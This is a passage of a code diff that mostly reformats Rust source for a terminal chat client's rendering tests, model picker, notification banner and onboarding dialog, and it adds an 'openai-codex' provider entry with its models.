+            ..Default::default()
+        };
 
         let msg = Message::user_blocks(vec![ContentBlock::ToolResult {
             tool_use_id: "tu-bash-1".to_string(),
@@ -1853,7 +2041,10 @@ mod tests {
             .join("\n");
         assert!(rendered.contains("hello world"), "output should appear");
         // bash_output_block does NOT prefix with "Result" (that's render_tool_result_success)
-        assert!(!rendered.contains("Result"), "bash output should NOT show generic 'Result' header");
+        assert!(
+            !rendered.contains("Result"),
+            "bash output should NOT show generic 'Result' header"
+        );
     }
 
     #[test]
@@ -1869,7 +2060,10 @@ mod tests {
             .map(|l| line_text(&l))
             .collect::<Vec<_>>()
             .join("\n");
-        assert!(rendered.contains("file content here"), "content should appear");
+        assert!(
+            rendered.contains("file content here"),
+            "content should appear"
+        );
     }
 
     // ── New function tests ────────────────────────────────────────────────────
@@ -1878,7 +2072,11 @@ mod tests {
     fn test_render_system_api_error_short_message() {
         let result = render_system_api_error("Connection refused", None);
         assert!(!result.is_empty());
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         assert!(combined.contains("API Error"));
         assert!(combined.contains("Connection refused"));
         // No retry line
@@ -1888,7 +2086,11 @@ mod tests {
     #[test]
     fn test_render_system_api_error_with_retry() {
         let result = render_system_api_error("Timeout", Some(30));
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         assert!(combined.contains("API Error"));
         assert!(combined.contains("Timeout"));
         assert!(combined.contains("Retrying in 30s"));
@@ -1896,10 +2098,20 @@ mod tests {
 
     #[test]
     fn test_render_system_api_error_long_message_shows_expand_hint() {
-        let msg = (0..10).map(|i| format!("line {}", i)).collect::<Vec<_>>().join("\n");
+        let msg = (0..10)
+            .map(|i| format!("line {}", i))
+            .collect::<Vec<_>>()
+            .join("\n");
         let result = render_system_api_error(&msg, None);
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
-        assert!(combined.contains("[expand]"), "should show [expand] hint when more than 5 lines");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
+        assert!(
+            combined.contains("[expand]"),
+            "should show [expand] hint when more than 5 lines"
+        );
         assert!(combined.contains("5 more lines"));
     }
 
@@ -1925,7 +2137,10 @@ mod tests {
 
     #[test]
     fn test_render_user_local_command_output_with_overflow() {
-        let output = (0..20).map(|i| format!("out {}", i)).collect::<Vec<_>>().join("\n");
+        let output = (0..20)
+            .map(|i| format!("out {}", i))
+            .collect::<Vec<_>>()
+            .join("\n");
         let result = render_user_local_command_output("ls", &output, 5);
         // 1 header + 5 body + 1 overflow = 7
         assert_eq!(result.len(), 7);
@@ -1965,7 +2180,10 @@ mod tests {
         assert!(text.contains('\u{25b8}'), "should have ▸ prefix");
         assert!(text.contains("Read"));
         assert!(text.contains("src/lib.rs"));
-        assert!(!text.contains("more"), "should not show 'more' when n_hidden is 0");
+        assert!(
+            !text.contains("more"),
+            "should not show 'more' when n_hidden is 0"
+        );
     }
 
     #[test]
@@ -1979,9 +2197,17 @@ mod tests {
 
     #[test]
     fn test_render_task_assignment() {
-        let result = render_task_assignment("42", "Implement feature X", "Add the new widget system\nWith multi-line support");
+        let result = render_task_assignment(
+            "42",
+            "Implement feature X",
+            "Add the new widget system\nWith multi-line support",
+        );
         assert!(!result.is_empty());
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         assert!(combined.contains("Implement feature X"));
         assert!(combined.contains("task #42"));
         assert!(combined.contains("Add the new widget system"));
@@ -1989,12 +2215,22 @@ mod tests {
 
     #[test]
     fn test_render_task_assignment_truncates_desc_at_5_lines() {
-        let desc = (0..10).map(|i| format!("desc line {}", i)).collect::<Vec<_>>().join("\n");
+        let desc = (0..10)
+            .map(|i| format!("desc line {}", i))
+            .collect::<Vec<_>>()
+            .join("\n");
         let result = render_task_assignment("1", "Subject", &desc);
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         // Only first 5 desc lines should appear
         assert!(combined.contains("desc line 4"));
-        assert!(!combined.contains("desc line 5"), "should truncate desc at 5 lines");
+        assert!(
+            !combined.contains("desc line 5"),
+            "should truncate desc at 5 lines"
+        );
     }
 
     #[test]
@@ -2013,18 +2249,29 @@ mod tests {
         let result = render_grouped_tool_use(&names, true);
         // 1 header + 2 tool lines
         assert_eq!(result.len(), 3);
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         assert!(combined.contains("2 tool calls"));
         assert!(combined.contains("Bash"));
         assert!(combined.contains("Read"));
-        assert!(combined.contains('\u{2022}'), "expanded lines should have • prefix");
+        assert!(
+            combined.contains('\u{2022}'),
+            "expanded lines should have • prefix"
+        );
     }
 
     #[test]
     fn test_render_rate_limit_with_hint_false() {
         let result = render_rate_limit_with_hint(60, false);
         assert_eq!(result.len(), 2, "without hint should have 2 lines");
-        let combined = result.iter().map(|l| line_text(l)).collect::<Vec<_>>().join("\n");
+        let combined = result
+            .iter()
+            .map(|l| line_text(l))
+            .collect::<Vec<_>>()
+            .join("\n");
         assert!(combined.contains("Rate limit exceeded"));
         assert!(combined.contains("Retrying in 60s"));
         assert!(!combined.contains("upgrade"));
@@ -2084,6 +2331,3 @@ mod tests {
         assert_eq!(a_text, b_text);
     }
 }
-
-
-

--- a/src-rust/crates/tui/src/model_picker.rs
+++ b/src-rust/crates/tui/src/model_picker.rs
@@ -32,19 +32,19 @@ impl EffortLevel {
     /// Unicode quarter-circle symbol used in the TS UI.
     pub fn symbol(self) -> &'static str {
         match self {
-            Self::Low    => "\u{25cb}", // ○  empty circle
+            Self::Low => "\u{25cb}",    // ○  empty circle
             Self::Normal => "\u{25d0}", // ◐  half
-            Self::High   => "\u{25d5}", // ◕  three-quarter
-            Self::Max    => "\u{25cf}", // ●  full
+            Self::High => "\u{25d5}",   // ◕  three-quarter
+            Self::Max => "\u{25cf}",    // ●  full
         }
     }
 
     pub fn label(self) -> &'static str {
         match self {
-            Self::Low    => "low",
+            Self::Low => "low",
             Self::Normal => "normal",
-            Self::High   => "high",
-            Self::Max    => "max",
+            Self::High => "high",
+            Self::Max => "max",
         }
     }
 
@@ -52,10 +52,10 @@ impl EffortLevel {
     /// default (no extended thinking).
     pub fn budget_tokens(self) -> Option<u32> {
         match self {
-            Self::Low    => Some(1_024),
+            Self::Low => Some(1_024),
             Self::Normal => None,
-            Self::High   => Some(16_000),
-            Self::Max    => Some(32_000),
+            Self::High => Some(16_000),
+            Self::Max => Some(32_000),
         }
     }
 
@@ -63,26 +63,40 @@ impl EffortLevel {
     /// support it.
     pub fn next(self, supports_max: bool) -> Self {
         match self {
-            Self::Low    => Self::Normal,
+            Self::Low => Self::Normal,
             Self::Normal => Self::High,
-            Self::High   => if supports_max { Self::Max } else { Self::Low },
-            Self::Max    => Self::Low,
+            Self::High => {
+                if supports_max {
+                    Self::Max
+                } else {
+                    Self::Low
+                }
+            }
+            Self::Max => Self::Low,
         }
     }
 
     /// Cycle to previous level.
     pub fn prev(self, supports_max: bool) -> Self {
         match self {
-            Self::Low    => if supports_max { Self::Max } else { Self::High },
+            Self::Low => {
+                if supports_max {
+                    Self::Max
+                } else {
+                    Self::High
+                }
+            }
             Self::Normal => Self::Low,
-            Self::High   => Self::Normal,
-            Self::Max    => Self::High,
+            Self::High => Self::Normal,
+            Self::Max => Self::High,
         }
     }
 }
 
 impl Default for EffortLevel {
-    fn default() -> Self { Self::Normal }
+    fn default() -> Self {
+        Self::Normal
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -130,7 +144,11 @@ pub fn model_family_description(id: &str) -> String {
 /// Format a model display line with optional context window and cost info.
 ///
 /// Example: `"gpt-4o  128K ctx  $5.00/M"`
-pub fn format_model_line(model_str: &str, context_window: Option<u32>, cost_per_1m: Option<f64>) -> String {
+pub fn format_model_line(
+    model_str: &str,
+    context_window: Option<u32>,
+    cost_per_1m: Option<f64>,
+) -> String {
     let mut parts = vec![model_str.to_string()];
     if let Some(ctx) = context_window {
         parts.push(format!("{}K ctx", ctx / 1000));
@@ -277,9 +295,21 @@ pub fn models_for_provider_from_registry(
 pub fn models_for_provider(provider_id: &str) -> Vec<ModelEntry> {
     match provider_id {
         "anthropic" => vec![
-            model_entry("claude-opus-4-6", "Claude Opus 4.6", "Most capable — best for complex reasoning and analysis"),
-            model_entry("claude-sonnet-4-6", "Claude Sonnet 4.6", "Balanced performance and speed — great for coding tasks"),
-            model_entry("claude-haiku-4-5-20251001", "Claude Haiku 4.5", "Fast and efficient — ideal for quick completions"),
+            model_entry(
+                "claude-opus-4-6",
+                "Claude Opus 4.6",
+                "Most capable — best for complex reasoning and analysis",
+            ),
+            model_entry(
+                "claude-sonnet-4-6",
+                "Claude Sonnet 4.6",
+                "Balanced performance and speed — great for coding tasks",
+            ),
+            model_entry(
+                "claude-haiku-4-5-20251001",
+                "Claude Haiku 4.5",
+                "Fast and efficient — ideal for quick completions",
+            ),
         ],
         "openai" => vec![
             model_entry("gpt-4o", "GPT-4o", "128K context"),
@@ -291,6 +321,18 @@ pub fn models_for_provider(provider_id: &str) -> Vec<ModelEntry> {
             model_entry("o3-mini", "o3 mini", "200K context"),
             model_entry("o4-mini", "o4 mini", "200K context"),
             model_entry("gpt-4-turbo", "GPT-4 Turbo", "128K context"),
+        ],
+        "openai-codex" => vec![
+            model_entry("gpt-5.2-codex", "GPT-5.2 Codex", "ChatGPT Plus/Pro"),
+            model_entry("gpt-5.1-codex", "GPT-5.1 Codex", "ChatGPT Plus/Pro"),
+            model_entry(
+                "gpt-5.1-codex-mini",
+                "GPT-5.1 Codex Mini",
+                "ChatGPT Plus/Pro",
+            ),
+            model_entry("gpt-5.1-codex-max", "GPT-5.1 Codex Max", "ChatGPT Plus/Pro"),
+            model_entry("gpt-5.4", "GPT-5.4", "ChatGPT Plus/Pro"),
+            model_entry("gpt-5.4-mini", "GPT-5.4 Mini", "ChatGPT Plus/Pro"),
         ],
         "google" => vec![
             model_entry("gemini-2.5-pro", "Gemini 2.5 Pro", "1M context"),
@@ -322,10 +364,18 @@ pub fn models_for_provider(provider_id: &str) -> Vec<ModelEntry> {
             model_entry("grok-3-mini", "Grok 3 mini", "128K context"),
         ],
         "openrouter" => vec![
-            model_entry("anthropic/claude-sonnet-4", "Claude Sonnet 4", "via OpenRouter"),
+            model_entry(
+                "anthropic/claude-sonnet-4",
+                "Claude Sonnet 4",
+                "via OpenRouter",
+            ),
             model_entry("openai/gpt-4o", "GPT-4o", "via OpenRouter"),
             model_entry("google/gemini-2.5-pro", "Gemini 2.5 Pro", "via OpenRouter"),
-            model_entry("meta-llama/llama-3.3-70b-instruct", "Llama 3.3 70B", "via OpenRouter"),
+            model_entry(
+                "meta-llama/llama-3.3-70b-instruct",
+                "Llama 3.3 70B",
+                "via OpenRouter",
+            ),
         ],
         "github-copilot" => vec![
             model_entry("claude-sonnet-4.6", "Claude Sonnet 4.6", "via Copilot"),
@@ -349,17 +399,39 @@ pub fn models_for_provider(provider_id: &str) -> Vec<ModelEntry> {
             model_entry("sonar", "Sonar", "search-augmented"),
         ],
         "togetherai" | "together-ai" => vec![
-            model_entry("meta-llama/Llama-3.3-70B-Instruct-Turbo", "Llama 3.3 70B Turbo", "128K context"),
-            model_entry("meta-llama/Llama-3.1-8B-Instruct-Turbo", "Llama 3.1 8B Turbo", "128K context"),
-            model_entry("Qwen/Qwen2.5-72B-Instruct-Turbo", "Qwen 2.5 72B Turbo", "128K context"),
+            model_entry(
+                "meta-llama/Llama-3.3-70B-Instruct-Turbo",
+                "Llama 3.3 70B Turbo",
+                "128K context",
+            ),
+            model_entry(
+                "meta-llama/Llama-3.1-8B-Instruct-Turbo",
+                "Llama 3.1 8B Turbo",
+                "128K context",
+            ),
+            model_entry(
+                "Qwen/Qwen2.5-72B-Instruct-Turbo",
+                "Qwen 2.5 72B Turbo",
+                "128K context",
+            ),
         ],
         "deepinfra" => vec![
-            model_entry("meta-llama/Llama-3.3-70B-Instruct", "Llama 3.3 70B", "128K context"),
-            model_entry("meta-llama/Llama-3.1-8B-Instruct", "Llama 3.1 8B", "128K context"),
+            model_entry(
+                "meta-llama/Llama-3.3-70B-Instruct",
+                "Llama 3.3 70B",
+                "128K context",
+            ),
+            model_entry(
+                "meta-llama/Llama-3.1-8B-Instruct",
+                "Llama 3.1 8B",
+                "128K context",
+            ),
         ],
-        "venice" => vec![
-            model_entry("llama-3.3-70b", "Llama 3.3 70B", "128K context"),
-        ],
+        "venice" => vec![model_entry(
+            "llama-3.3-70b",
+            "Llama 3.3 70B",
+            "128K context",
+        )],
         "ollama" => vec![
             model_entry("llama3.2", "Llama 3.2", "local"),
             model_entry("mistral", "Mistral", "local"),
@@ -373,18 +445,20 @@ pub fn models_for_provider(provider_id: &str) -> Vec<ModelEntry> {
             model_entry("gpt-4o-mini", "GPT-4o mini (Azure)", "128K context"),
         ],
         "amazon-bedrock" => vec![
-            model_entry("anthropic.claude-sonnet-4-6-v1", "Claude Sonnet 4.6 (Bedrock)", "200K context"),
-            model_entry("anthropic.claude-haiku-4-5-20251001-v1", "Claude Haiku 4.5 (Bedrock)", "200K context"),
+            model_entry(
+                "anthropic.claude-sonnet-4-6-v1",
+                "Claude Sonnet 4.6 (Bedrock)",
+                "200K context",
+            ),
+            model_entry(
+                "anthropic.claude-haiku-4-5-20251001-v1",
+                "Claude Haiku 4.5 (Bedrock)",
+                "200K context",
+            ),
         ],
-        "lmstudio" => vec![
-            model_entry("default", "Default model", "local"),
-        ],
-        "llamacpp" => vec![
-            model_entry("default", "Default model", "local"),
-        ],
-        _ => vec![
-            model_entry("default", "Default model", ""),
-        ],
+        "lmstudio" => vec![model_entry("default", "Default model", "local")],
+        "llamacpp" => vec![model_entry("default", "Default model", "local")],
+        _ => vec![model_entry("default", "Default model", "")],
     }
 }
 
@@ -396,6 +470,7 @@ pub fn default_model_for_provider(provider_id: &str) -> String {
     match provider_id {
         "anthropic" => "claude-opus-4-6".to_string(),
         "openai" => "openai/gpt-4o".to_string(),
+        "openai-codex" => "openai-codex/gpt-5.2-codex".to_string(),
         "google" => "google/gemini-2.5-flash".to_string(),
         "groq" => "groq/llama-3.3-70b-versatile".to_string(),
         "cerebras" => "cerebras/llama-3.3-70b".to_string(),
@@ -406,7 +481,9 @@ pub fn default_model_for_provider(provider_id: &str) -> String {
         "github-copilot" => "github-copilot/gpt-4o".to_string(),
         "cohere" => "cohere/command-r-plus".to_string(),
         "perplexity" => "perplexity/sonar-pro".to_string(),
-        "togetherai" | "together-ai" => "togetherai/meta-llama/Llama-3.3-70B-Instruct-Turbo".to_string(),
+        "togetherai" | "together-ai" => {
+            "togetherai/meta-llama/Llama-3.3-70B-Instruct-Turbo".to_string()
+        }
         "deepinfra" => "deepinfra/meta-llama/Llama-3.3-70B-Instruct".to_string(),
         "venice" => "venice/llama-3.3-70b".to_string(),
         "ollama" => "ollama/llama3.2".to_string(),
@@ -480,11 +557,7 @@ impl ModelPickerState {
         for m in &mut self.models {
             m.is_current = m.id == current_model;
         }
-        self.selected_idx = self
-            .models
-            .iter()
-            .position(|m| m.is_current)
-            .unwrap_or(0);
+        self.selected_idx = self.models.iter().position(|m| m.is_current).unwrap_or(0);
         self.title = title.into();
         self.filter.clear();
         self.effort_level = effort;
@@ -501,7 +574,9 @@ impl ModelPickerState {
     /// Move selection up one row (wraps to last if at top).
     pub fn select_prev(&mut self) {
         let count = self.filtered_models().len();
-        if count == 0 { return; }
+        if count == 0 {
+            return;
+        }
         if self.selected_idx == 0 {
             self.selected_idx = count - 1;
         } else {
@@ -512,7 +587,9 @@ impl ModelPickerState {
     /// Move selection down one row (wraps to first if at bottom).
     pub fn select_next(&mut self) {
         let count = self.filtered_models().len();
-        if count == 0 { return; }
+        if count == 0 {
+            return;
+        }
         self.selected_idx = (self.selected_idx + 1) % count;
     }
 
@@ -528,7 +605,10 @@ impl ModelPickerState {
     /// Cycle effort level forward (→ key).
     pub fn effort_next(&mut self) {
         let filtered = self.filtered_models();
-        let id = filtered.get(self.selected_idx).map(|m| m.id.as_str()).unwrap_or("");
+        let id = filtered
+            .get(self.selected_idx)
+            .map(|m| m.id.as_str())
+            .unwrap_or("");
         let supports_max = model_supports_max_effort(id);
         self.effort_level = self.effort_level.next(supports_max);
     }
@@ -536,7 +616,10 @@ impl ModelPickerState {
     /// Cycle effort level backward (← key).
     pub fn effort_prev(&mut self) {
         let filtered = self.filtered_models();
-        let id = filtered.get(self.selected_idx).map(|m| m.id.as_str()).unwrap_or("");
+        let id = filtered
+            .get(self.selected_idx)
+            .map(|m| m.id.as_str())
+            .unwrap_or("");
         let supports_max = model_supports_max_effort(id);
         self.effort_level = self.effort_level.prev(supports_max);
     }
@@ -545,7 +628,10 @@ impl ModelPickerState {
     /// `None` if the model does not support extended thinking.
     pub fn effective_effort(&self) -> Option<EffortLevel> {
         let filtered = self.filtered_models();
-        let id = filtered.get(self.selected_idx).map(|m| m.id.as_str()).unwrap_or("");
+        let id = filtered
+            .get(self.selected_idx)
+            .map(|m| m.id.as_str())
+            .unwrap_or("");
         if model_supports_effort(id) {
             Some(self.effort_level)
         } else {
@@ -564,7 +650,11 @@ impl ModelPickerState {
         let filtered = self.filtered_models();
         let entry = filtered.get(self.selected_idx)?;
         let id = entry.id.clone();
-        let effort = if model_supports_effort(&id) { Some(self.effort_level) } else { None };
+        let effort = if model_supports_effort(&id) {
+            Some(self.effort_level)
+        } else {
+            None
+        };
         // If user chose a model other than the fast-mode model while fast mode is
         // active, the caller should turn off fast mode (mirrors TS behaviour).
         self.close();
@@ -630,18 +720,18 @@ impl ModelPickerState {
                 let mut entries: Vec<(i64, ModelEntry)> = available
                     .into_iter()
                     .map(|m| {
-                        let display = m
-                            .display_name
-                            .clone()
-                            .unwrap_or_else(|| m.id.clone());
+                        let display = m.display_name.clone().unwrap_or_else(|| m.id.clone());
                         let description = model_family_description(&m.id);
                         let ts = m.created_at.unwrap_or(0);
-                        (ts, ModelEntry {
-                            id: m.id,
-                            display_name: display,
-                            description,
-                            is_current: false,
-                        })
+                        (
+                            ts,
+                            ModelEntry {
+                                id: m.id,
+                                display_name: display,
+                                description,
+                                is_current: false,
+                            },
+                        )
                     })
                     .collect();
 
@@ -659,7 +749,8 @@ impl ModelPickerState {
             ModelEntry {
                 id: "claude-opus-4-6".to_string(),
                 display_name: "Claude Opus 4.6".to_string(),
-                description: "Most capable model — best for complex reasoning and analysis".to_string(),
+                description: "Most capable model — best for complex reasoning and analysis"
+                    .to_string(),
                 is_current: false,
             },
             ModelEntry {
@@ -715,7 +806,9 @@ impl ModelPickerState {
 }
 
 impl Default for ModelPickerState {
-    fn default() -> Self { Self::new() }
+    fn default() -> Self {
+        Self::new()
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -806,13 +899,26 @@ pub fn render_model_picker(state: &ModelPickerState, area: Rect, buf: &mut Buffe
     // Title row: "Select model" left, "esc" right
     let title_pad = inner.width.saturating_sub(state.title.len() as u16 + 5) as usize;
     header_lines.push(Line::from(vec![
-        Span::styled(format!(" {}", state.title), Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
-        Span::styled(format!("{:>w$}", "esc ", w = title_pad), Style::default().fg(dim)),
+        Span::styled(
+            format!(" {}", state.title),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
+        ),
+        Span::styled(
+            format!("{:>w$}", "esc ", w = title_pad),
+            Style::default().fg(dim),
+        ),
     ]));
 
     // Search field
     header_lines.push(Line::from(""));
-    header_lines.push(modal_search_line(&state.filter, "Search", dim, Color::White));
+    header_lines.push(modal_search_line(
+        &state.filter,
+        "Search",
+        dim,
+        Color::White,
+    ));
 
     let header_para = Paragraph::new(header_lines).bg(dialog_bg);
     header_para.render(header_area, buf);
@@ -844,7 +950,10 @@ pub fn render_model_picker(state: &ModelPickerState, area: Rect, buf: &mut Buffe
     }
 
     if filtered.is_empty() {
-        lines.push(Line::from(vec![Span::styled(" No results found", Style::default().fg(dim))]));
+        lines.push(Line::from(vec![Span::styled(
+            " No results found",
+            Style::default().fg(dim),
+        )]));
     } else {
         for (i, model) in filtered.iter().enumerate() {
             let is_selected = i == state.selected_idx;
@@ -864,24 +973,38 @@ pub fn render_model_picker(state: &ModelPickerState, area: Rect, buf: &mut Buffe
 
             // Current model indicator
             if model.is_current {
-                spans.push(Span::styled(" \u{25cf} ", Style::default().fg(Color::Green).bg(bg)));
+                spans.push(Span::styled(
+                    " \u{25cf} ",
+                    Style::default().fg(Color::Green).bg(bg),
+                ));
             } else {
                 spans.push(Span::styled("   ", Style::default().bg(bg)));
             }
 
-            spans.push(Span::styled(model.display_name.clone(), Style::default().fg(fg).bg(bg)));
+            spans.push(Span::styled(
+                model.display_name.clone(),
+                Style::default().fg(fg).bg(bg),
+            ));
 
             // Effort indicator
             if supports_effort && is_selected {
                 spans.push(Span::styled(
-                    format!("  {} {}", state.effort_level.symbol(), state.effort_level.label()),
+                    format!(
+                        "  {} {}",
+                        state.effort_level.symbol(),
+                        state.effort_level.label()
+                    ),
                     Style::default().fg(Color::Rgb(200, 255, 200)).bg(bg),
                 ));
             }
 
             // Description
             if !model.description.is_empty() {
-                let desc_fg = if is_selected { Color::Rgb(200, 200, 200) } else { dim };
+                let desc_fg = if is_selected {
+                    Color::Rgb(200, 200, 200)
+                } else {
+                    dim
+                };
                 spans.push(Span::styled(
                     format!("  {}", model.description),
                     Style::default().fg(desc_fg).bg(bg),
@@ -893,7 +1016,10 @@ pub fn render_model_picker(state: &ModelPickerState, area: Rect, buf: &mut Buffe
                 let text_len: usize = spans.iter().map(|s| s.content.len()).sum();
                 let pad = inner.width.saturating_sub(text_len as u16) as usize;
                 if pad > 0 {
-                    spans.push(Span::styled(" ".repeat(pad), Style::default().bg(highlight_bg)));
+                    spans.push(Span::styled(
+                        " ".repeat(pad),
+                        Style::default().bg(highlight_bg),
+                    ));
                 }
             }
 
@@ -928,9 +1054,14 @@ pub fn render_model_picker(state: &ModelPickerState, area: Rect, buf: &mut Buffe
         }
     }
     footer_spans.push(Span::raw("  "));
-    footer_spans.push(Span::styled(" /connect", Style::default().fg(Color::Rgb(233, 30, 99))));
+    footer_spans.push(Span::styled(
+        " /connect",
+        Style::default().fg(Color::Rgb(233, 30, 99)),
+    ));
     footer_spans.push(Span::styled(" providers", Style::default().fg(dim)));
-    Paragraph::new(Line::from(footer_spans)).bg(dialog_bg).render(footer_area, buf);
+    Paragraph::new(Line::from(footer_spans))
+        .bg(dialog_bg)
+        .render(footer_area, buf);
 }
 
 // ---------------------------------------------------------------------------
@@ -965,7 +1096,13 @@ mod tests {
         p.open("claude-sonnet-4-6");
         let current_count = p.models.iter().filter(|m| m.is_current).count();
         assert_eq!(current_count, 1);
-        assert!(p.models.iter().find(|m| m.id == "claude-sonnet-4-6").unwrap().is_current);
+        assert!(
+            p.models
+                .iter()
+                .find(|m| m.id == "claude-sonnet-4-6")
+                .unwrap()
+                .is_current
+        );
     }
 
     #[test]
@@ -1014,14 +1151,23 @@ mod tests {
     #[test]
     fn filter_reduces_results() {
         let mut p = make_picker_with_current("claude-opus-4-6");
-        for c in "sonnet".chars() { p.push_filter_char(c); }
+        for c in "sonnet".chars() {
+            p.push_filter_char(c);
+        }
         let all = p.models.len();
         let filtered = p.filtered_models();
-        assert!(filtered.len() < all, "filter should reduce the result count");
+        assert!(
+            filtered.len() < all,
+            "filter should reduce the result count"
+        );
         assert!(!filtered.is_empty(), "at least one sonnet model must match");
         for m in &filtered {
             let haystack = format!("{} {} {}", m.id, m.display_name, m.description).to_lowercase();
-            assert!(haystack.contains("sonnet"), "model '{}' does not match filter", m.id);
+            assert!(
+                haystack.contains("sonnet"),
+                "model '{}' does not match filter",
+                m.id
+            );
         }
     }
 
@@ -1029,7 +1175,9 @@ mod tests {
     #[test]
     fn pop_filter_char_removes_last() {
         let mut p = make_picker_with_current("claude-opus-4-6");
-        p.push_filter_char('h'); p.push_filter_char('a'); p.push_filter_char('i');
+        p.push_filter_char('h');
+        p.push_filter_char('a');
+        p.push_filter_char('i');
         assert_eq!(p.filter, "hai");
         p.pop_filter_char();
         assert_eq!(p.filter, "ha");
@@ -1091,7 +1239,11 @@ mod tests {
     #[test]
     fn haiku_has_no_effort() {
         let mut p = make_picker_with_current("claude-haiku-4-5");
-        p.selected_idx = p.models.iter().position(|m| m.id == "claude-haiku-4-5").unwrap();
+        p.selected_idx = p
+            .models
+            .iter()
+            .position(|m| m.id == "claude-haiku-4-5")
+            .unwrap();
         assert!(!model_supports_effort("claude-haiku-4-5"));
         let effort = p.confirm();
         assert!(effort.is_some_and(|(_, e)| e.is_none()));
@@ -1115,7 +1267,11 @@ mod tests {
         let mut buf = Buffer::empty(area);
         render_model_picker(&p, area, &mut buf);
         for cell in buf.content() {
-            assert_eq!(cell.symbol(), " ", "buffer should be empty when picker is hidden");
+            assert_eq!(
+                cell.symbol(),
+                " ",
+                "buffer should be empty when picker is hidden"
+            );
         }
     }
 

--- a/src-rust/crates/tui/src/notifications.rs
+++ b/src-rust/crates/tui/src/notifications.rs
@@ -48,7 +48,8 @@ impl NotificationQueue {
     ///
     /// * `duration_secs` — `None` for persistent, `Some(n)` for auto-expire after *n* seconds.
     pub fn push(&mut self, kind: NotificationKind, msg: String, duration_secs: Option<u64>) {
-        let expires_at = duration_secs.map(|secs| Instant::now() + std::time::Duration::from_secs(secs));
+        let expires_at =
+            duration_secs.map(|secs| Instant::now() + std::time::Duration::from_secs(secs));
         self.notifications
             .retain(|n| !(n.kind == kind && n.message == msg));
         let id = format!("notif-{}", self.next_id);
@@ -70,9 +71,8 @@ impl NotificationQueue {
     /// Remove all expired notifications.  Call this once per render frame.
     pub fn tick(&mut self) {
         let now = Instant::now();
-        self.notifications.retain(|n| {
-            n.expires_at.map_or(true, |exp| exp > now)
-        });
+        self.notifications
+            .retain(|n| n.expires_at.map_or(true, |exp| exp > now));
     }
 
     /// Return the currently visible (most recent) notification, if any.
@@ -150,26 +150,43 @@ pub fn render_notification_banner(frame: &mut Frame, queue: &NotificationQueue, 
     let icon = notif.kind.icon();
 
     let mut spans = vec![
-        Span::styled(format!(" {} ", icon), Style::default().fg(color).add_modifier(Modifier::BOLD)),
-        Span::styled(notif.message.clone(), Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            format!(" {} ", icon),
+            Style::default().fg(color).add_modifier(Modifier::BOLD),
+        ),
+        Span::styled(
+            notif.message.clone(),
+            Style::default()
+                .fg(CLAURST_TEXT)
+                .add_modifier(Modifier::BOLD),
+        ),
     ];
     if notif.dismissible {
-        spans.push(Span::styled("  Esc dismiss", Style::default().fg(CLAURST_MUTED)));
+        spans.push(Span::styled(
+            "  Esc dismiss",
+            Style::default().fg(CLAURST_MUTED),
+        ));
     }
 
     let content_width = spans.iter().map(|span| span.content.len()).sum::<usize>();
     if content_width > banner_width.saturating_sub(2) as usize {
         spans = vec![
-            Span::styled(format!(" {} ", icon), Style::default().fg(color).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                format!(" {} ", icon),
+                Style::default().fg(color).add_modifier(Modifier::BOLD),
+            ),
             Span::styled(
                 format!(
                     "{}…",
-                    notif.message
+                    notif
+                        .message
                         .chars()
                         .take(banner_width.saturating_sub(6) as usize)
                         .collect::<String>()
                 ),
-                Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(CLAURST_TEXT)
+                    .add_modifier(Modifier::BOLD),
             ),
         ];
     }
@@ -190,10 +207,10 @@ pub fn render_notification_banner(frame: &mut Frame, queue: &NotificationQueue, 
             cell.set_fg(CLAURST_PANEL_BORDER);
             cell.set_char('▌');
         }
-        if let Some(cell) = frame
-            .buffer_mut()
-            .cell_mut((banner_area.x.saturating_add(banner_area.width - 1), banner_area.y))
-        {
+        if let Some(cell) = frame.buffer_mut().cell_mut((
+            banner_area.x.saturating_add(banner_area.width - 1),
+            banner_area.y,
+        )) {
             cell.set_bg(CLAURST_PANEL_BG);
             cell.set_fg(CLAURST_PANEL_BORDER);
             cell.set_char('▐');

--- a/src-rust/crates/tui/src/onboarding_dialog.rs
+++ b/src-rust/crates/tui/src/onboarding_dialog.rs
@@ -89,11 +89,7 @@ impl OnboardingDialogState {
 // Rendering
 // ---------------------------------------------------------------------------
 
-pub fn render_onboarding_dialog(
-    frame: &mut Frame,
-    state: &OnboardingDialogState,
-    area: Rect,
-) {
+pub fn render_onboarding_dialog(frame: &mut Frame, state: &OnboardingDialogState, area: Rect) {
     if !state.visible {
         return;
     }
@@ -121,7 +117,10 @@ fn render_provider_setup_page(frame: &mut Frame, area: Rect) {
         .borders(Borders::ALL)
         .title(Line::from(vec![
             Span::styled("─── ", Style::default().fg(pink)),
-            Span::styled(" Connect a Provider ", Style::default().fg(pink).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                " Connect a Provider ",
+                Style::default().fg(pink).add_modifier(Modifier::BOLD),
+            ),
             Span::styled(" ───", Style::default().fg(pink)),
         ]))
         .border_style(Style::default().fg(pink));
@@ -134,72 +133,164 @@ fn render_provider_setup_page(frame: &mut Frame, area: Rect) {
